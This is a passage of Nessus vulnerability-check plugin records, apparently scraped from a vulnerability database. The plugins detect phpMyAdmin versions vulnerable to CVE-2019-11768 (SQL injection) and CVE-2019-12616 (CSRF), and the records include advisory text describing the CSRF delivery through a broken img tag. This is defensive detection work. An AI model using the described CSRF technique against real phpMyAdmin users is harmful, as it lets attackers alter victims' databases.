value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"phpMyAdmin-4.9.0.1-lp151.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T02:33:16", "description": "Upstream announcement :\n\nWelcome to **phpMyAdmin 4.9.0.1**, a bugfix release that includes\nimportant security fixes.\n\nThis release fixes two security vulnerabilities :\n\n - PMASA-2019-3 is a SQL injection flaw in the Designer\n feature\n\n - PMASA-2019-4 is a CSRF attack that's possible through\n the 'cookie' login form\n\nUpgrading is highly recommended for all users. Using the 'http'\nauth_type instead of 'cookie' can mitigate the CSRF attack.\n\nThe solution for the CSRF attack does remove the former functionality\nto log in directly through URL parameters (as mentioned in FAQ 4.8,\nsuch as\nhttps://example.com/phpmyadmin/?pma_username=root&password=foo). Such\nbehavior was discouraged and is now removed. Other query parameters\nwork as expected; only pma_username and pma_password have been\nremoved.\n\nThis release also includes fixes for many bugs, including :\n\n - Several issues with SYSTEM VERSIONING tables\n\n - Fixed json encode error in export\n\n - Fixed JavaScript events not activating on input (sql\n bookmark issue)\n\n - Show Designer combo boxes when adding a constraint\n\n - Fix edit view\n\n - Fixed invalid default value for bit field\n\n - Fix several errors relating to GIS data types\n\n - Fixed JavaScript error PMA_messages is not defined\n\n - Fixed import XML data with leading zeros\n\n - Fixed php notice, added support for 'DELETE HISTORY'\n table privilege (MariaDB >= 10.3.4)\n\n - Fixed MySQL 8.0.0 issues with GIS display\n\n - Fixed 'Server charset' in 'Database server' tab showing\n wrong information\n\n - Fixed can not copy user on Percona Server 5.7\n\n - Updated sql-parser to version 4.3.2, which fixes several\n parsing and linting problems\n\nThere are many, many more bug fixes thanks to the efforts of our\ndevelopers, Google Summer of Code applicants, and other contributors.\n\nThe phpMyAdmin team\n\n----\n\n**phpmyadmin/sql-parser version 4.3.2**\n\n - Fix redundant whitespaces in build() outputs (#228)\n\n - Fix incorrect error on DEFAULT keyword in ALTER\n operation (#229)\n\n - Fix incorrect outputs from Query::getClause (#233)\n\n - Add support for reading a SQL file from stdin\n\n - Fix for missing tokenize-query in Composer's vendor/bin/\n directory\n\n - Fix for PHP warnings with an incomplete CASE expression\n (#241)\n\n - Fix for error message with multiple CALL statements\n (#223)\n\n - Recognize the question mark character as a parameter\n (#242)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-14T00:00:00", "title": "Fedora 30 : php-phpmyadmin-sql-parser / phpMyAdmin (2019-13d2ba0aed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:30", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "p-cpe:/a:fedoraproject:fedora:php-phpmyadmin-sql-parser"], "id": "FEDORA_2019-13D2BA0AED.NASL", "href": "https://www.tenable.com/plugins/nessus/125906", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-13d2ba0aed.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125906);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/23 11:21:09\");\n\n script_cve_id(\"CVE-2019-11768\", \"CVE-2019-12616\");\n script_xref(name:\"FEDORA\", value:\"2019-13d2ba0aed\");\n\n script_name(english:\"Fedora 30 : php-phpmyadmin-sql-parser / phpMyAdmin (2019-13d2ba0aed)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream announcement :\n\nWelcome to **phpMyAdmin 4.9.0.1**, a bugfix release that includes\nimportant security fixes.\n\nThis release fixes two security vulnerabilities :\n\n - PMASA-2019-3 is a SQL injection flaw in the Designer\n feature\n\n - PMASA-2019-4 is a CSRF attack that's possible through\n the 'cookie' login form\n\nUpgrading is highly recommended for all users. Using the 'http'\nauth_type instead of 'cookie' can mitigate the CSRF attack.\n\nThe solution for the CSRF attack does remove the former functionality\nto log in directly through URL parameters (as mentioned in FAQ 4.8,\nsuch as\nhttps://example.com/phpmyadmin/?pma_username=root&password=foo). Such\nbehavior was discouraged and is now removed. Other query parameters\nwork as expected; only pma_username and pma_password have been\nremoved.\n\nThis release also includes fixes for many bugs, including :\n\n - Several issues with SYSTEM VERSIONING tables\n\n - Fixed json encode error in export\n\n - Fixed JavaScript events not activating on input (sql\n bookmark issue)\n\n - Show Designer combo boxes when adding a constraint\n\n - Fix edit view\n\n - Fixed invalid default value for bit field\n\n - Fix several errors relating to GIS data types\n\n - Fixed JavaScript error PMA_messages is not defined\n\n - Fixed import XML data with leading zeros\n\n - Fixed php notice, added support for 'DELETE HISTORY'\n table privilege (MariaDB >= 10.3.4)\n\n - Fixed MySQL 8.0.0 issues with GIS display\n\n - Fixed 'Server charset' in 'Database server' tab showing\n wrong information\n\n - Fixed can not copy user on Percona Server 5.7\n\n - Updated sql-parser to version 4.3.2, which fixes several\n parsing and linting problems\n\nThere are many, many more bug fixes thanks to the efforts of our\ndevelopers, Google Summer of Code applicants, and other contributors.\n\nThe phpMyAdmin team\n\n----\n\n**phpmyadmin/sql-parser version 4.3.2**\n\n - Fix redundant whitespaces in build() outputs (#228)\n\n - Fix incorrect error on DEFAULT keyword in ALTER\n operation (#229)\n\n - Fix incorrect outputs from Query::getClause (#233)\n\n - Add support for reading a SQL file from stdin\n\n - Fix for missing tokenize-query in Composer's vendor/bin/\n directory\n\n - Fix for PHP warnings with an incomplete CASE expression\n (#241)\n\n - Fix for error message with multiple CALL statements\n (#223)\n\n - Recognize the question mark character as a parameter\n (#242)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-13d2ba0aed\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://example.com/phpmyadmin/?pma_username=root&password=foo\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected php-phpmyadmin-sql-parser and / or phpMyAdmin\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-phpmyadmin-sql-parser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"php-phpmyadmin-sql-parser-4.3.2-1.fc30\")) flag++;\nif (rpm_check(release:\"FC30\", reference:\"phpMyAdmin-4.9.0.1-1.fc30\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-phpmyadmin-sql-parser / phpMyAdmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T02:34:15", "description": "Upstream announcement :\n\nWelcome to **phpMyAdmin 4.9.0.1**, a bugfix release that includes\nimportant security fixes.\n\nThis release fixes two security vulnerabilities :\n\n - PMASA-2019-3 is a SQL injection flaw in the Designer\n feature\n\n - PMASA-2019-4 is a CSRF attack that's possible through\n the 'cookie' login form\n\nUpgrading is highly recommended for all users. Using the 'http'\nauth_type instead of 'cookie' can mitigate the CSRF attack.\n\nThe solution for the CSRF attack does remove the former functionality\nto log in directly through URL parameters (as mentioned in FAQ 4.8,\nsuch as\nhttps://example.com/phpmyadmin/?pma_username=root&password=foo). Such\nbehavior was discouraged and is now removed. Other query parameters\nwork as expected; only pma_username and pma_password have been\nremoved.\n\nThis release also includes fixes for many bugs, including :\n\n - Several issues with SYSTEM VERSIONING tables\n\n - Fixed json encode error in export\n\n - Fixed JavaScript events not activating on input (sql\n bookmark issue)\n\n - Show Designer combo boxes when adding a constraint\n\n - Fix edit view\n\n - Fixed invalid default value for bit field\n\n - Fix several errors relating to GIS data types\n\n - Fixed JavaScript error PMA_messages is not defined\n\n - Fixed import XML data with leading zeros\n\n - Fixed php notice, added support for 'DELETE HISTORY'\n table privilege (MariaDB >= 10.3.4)\n\n - Fixed MySQL 8.0.0 issues with GIS display\n\n - Fixed 'Server charset' in 'Database server' tab showing\n wrong information\n\n - Fixed can not copy user on Percona Server 5.7\n\n - Updated sql-parser to version 4.3.2, which fixes several\n parsing and linting problems\n\nThere are many, many more bug fixes thanks to the efforts of our\ndevelopers, Google Summer of Code applicants, and other contributors.\n\nThe phpMyAdmin team\n\n----\n\n**phpmyadmin/sql-parser version 4.3.2**\n\n - Fix redundant whitespaces in build() outputs (#228)\n\n - Fix incorrect error on DEFAULT keyword in ALTER\n operation (#229)\n\n - Fix incorrect outputs from Query::getClause (#233)\n\n - Add support for reading a SQL file from stdin\n\n - Fix for missing tokenize-query in Composer's vendor/bin/\n directory\n\n - Fix for PHP warnings with an incomplete CASE expression\n (#241)\n\n - Fix for error message with multiple CALL statements\n (#223)\n\n - Recognize the question mark character as a parameter\n (#242)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-14T00:00:00", "title": "Fedora 29 : php-phpmyadmin-sql-parser / phpMyAdmin (2019-33649e2e64)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "p-cpe:/a:fedoraproject:fedora:php-phpmyadmin-sql-parser"], "id": "FEDORA_2019-33649E2E64.NASL", "href": "https://www.tenable.com/plugins/nessus/125907", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-33649e2e64.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125907);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/23 11:21:10\");\n\n script_cve_id(\"CVE-2019-11768\", \"CVE-2019-12616\");\n script_xref(name:\"FEDORA\", value:\"2019-33649e2e64\");\n\n script_name(english:\"Fedora 29 : php-phpmyadmin-sql-parser / phpMyAdmin (2019-33649e2e64)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream announcement :\n\nWelcome to **phpMyAdmin 4.9.0.1**, a bugfix release that includes\nimportant security fixes.\n\nThis release fixes two security vulnerabilities :\n\n - PMASA-2019-3 is a SQL injection flaw in the Designer\n feature\n\n - PMASA-2019-4 is a CSRF attack that's possible through\n the 'cookie' login form\n\nUpgrading is highly recommended for all users. Using the 'http'\nauth_type instead of 'cookie' can mitigate the CSRF attack.\n\nThe solution for the CSRF attack does remove the former functionality\nto log in directly through URL parameters (as mentioned in FAQ 4.8,\nsuch as\nhttps://example.com/phpmyadmin/?pma_username=root&password=foo). Such\nbehavior was discouraged and is now removed. Other query parameters\nwork as expected; only pma_username and pma_password have been\nremoved.\n\nThis release also includes fixes for many bugs, including :\n\n - Several issues with SYSTEM VERSIONING tables\n\n - Fixed json encode error in export\n\n - Fixed JavaScript events not activating on input (sql\n bookmark issue)\n\n - Show Designer combo boxes when adding a constraint\n\n - Fix edit view\n\n - Fixed invalid default value for bit field\n\n - Fix several errors relating to GIS data types\n\n - Fixed JavaScript error PMA_messages is not defined\n\n - Fixed import XML data with leading zeros\n\n - Fixed php notice, added support for 'DELETE HISTORY'\n table privilege (MariaDB >= 10.3.4)\n\n - Fixed MySQL 8.0.0 issues with GIS display\n\n - Fixed 'Server charset' in 'Database server' tab showing\n wrong information\n\n - Fixed can not copy user on Percona Server 5.7\n\n - Updated sql-parser to version 4.3.2, which fixes several\n parsing and linting problems\n\nThere are many, many more bug fixes thanks to the efforts of our\ndevelopers, Google Summer of Code applicants, and other contributors.\n\nThe phpMyAdmin team\n\n----\n\n**phpmyadmin/sql-parser version 4.3.2**\n\n - Fix redundant whitespaces in build() outputs (#228)\n\n - Fix incorrect error on DEFAULT keyword in ALTER\n operation (#229)\n\n - Fix incorrect outputs from Query::getClause (#233)\n\n - Add support for reading a SQL file from stdin\n\n - Fix for missing tokenize-query in Composer's vendor/bin/\n directory\n\n - Fix for PHP warnings with an incomplete CASE expression\n (#241)\n\n - Fix for error message with multiple CALL statements\n (#223)\n\n - Recognize the question mark character as a parameter\n (#242)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-33649e2e64\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://example.com/phpmyadmin/?pma_username=root&password=foo\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected php-phpmyadmin-sql-parser and / or phpMyAdmin\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-phpmyadmin-sql-parser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"php-phpmyadmin-sql-parser-4.3.2-1.fc29\")) flag++;\nif (rpm_check(release:\"FC29\", reference:\"phpMyAdmin-4.9.0.1-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php-phpmyadmin-sql-parser / phpMyAdmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T05:22:32", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote\nweb server is prior to 4.8.6. It is, therefore, affected by a SQL injection (SQLi) vulnerability\nthat exists in designer feature of phpMyAdmin. An unauthenticated, remote attacker can exploit this\nto inject or manipulate SQL queries in the back-end database, resulting in the disclosure or\nmanipulation of arbitrary data.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-13T00:00:00", "title": "phpMyAdmin prior to 4.8.6 SQLi vulnerablity (PMASA-2019-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2019_3.NASL", "href": "https://www.tenable.com/plugins/nessus/125855", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125855);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/10/18 23:14:14\");\n\n script_cve_id(\"CVE-2019-11768\");\n script_bugtraq_id(108617);\n\n script_name(english:\"phpMyAdmin prior to 4.8.6 SQLi vulnerablity (PMASA-2019-3)\");\n script_summary(english:\"Checks the version of phpMyAdmin.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by SQLi vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin application hosted on the remote\nweb server is prior to 4.8.6. It is, therefore, affected by a SQL injection (SQLi) vulnerability\nthat exists in designer feature of phpMyAdmin. An unauthenticated, remote attacker can exploit this\nto inject or manipulate SQL queries in the back-end database, resulting in the disclosure or\nmanipulation of arbitrary data.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n # https://www.phpmyadmin.net/security/PMASA-2019-3/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c9d7fc8c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin version 4.8.6 or later.\nAlternatively, apply the patches referenced in the vendor advisories.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11768\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/phpMyAdmin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\ninclude('http.inc');\ninclude('vcf.inc');\n\nport = get_http_port(default:80, php:TRUE);\nappname = 'phpMyAdmin';\napp_info = vcf::get_app_info(app:appname, port:port, webapp:TRUE);\n\nconstraints = [{'fixed_version':'4.8.6'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T02:57:33", "description": "The phpMyAdmin development team reports : Summary CSRF vulnerability\nin login form Description A vulnerability was found that allows an\nattacker to trigger a CSRF attack against a phpMyAdmin user. The\nattacker can trick the user, for instance through a broken <img> tag\npointing at the victim's phpMyAdmin database, and the attacker can\npotentially deliver a payload (such as a specific INSERT or DELETE\nstatement) through the victim. Severity We consider this vulnerability\nto be severe. Mitigation factor Only the 'cookie' auth_type is\naffected; users can temporary use phpMyAdmin's http authentication as\na workaround.", "edition": 19, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"}, "published": "2019-06-17T00:00:00", "title": "FreeBSD : phpMyAdmin -- CSRF vulnerability in login form (a5681027-8e03-11e9-85f4-6805ca0b3d42)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin-php70", "p-cpe:/a:freebsd:freebsd:phpMyAdmin-php56", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:phpMyAdmin", "p-cpe:/a:freebsd:freebsd:phpMyAdmin-php71", "p-cpe:/a:freebsd:freebsd:phpMyAdmin-php72"], "id": "FREEBSD_PKG_A56810278E0311E985F46805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/125936", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125936);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/06/20 11:24:24\");\n\n script_cve_id(\"CVE-2019-12616\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- CSRF vulnerability in login form (a5681027-8e03-11e9-85f4-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports : 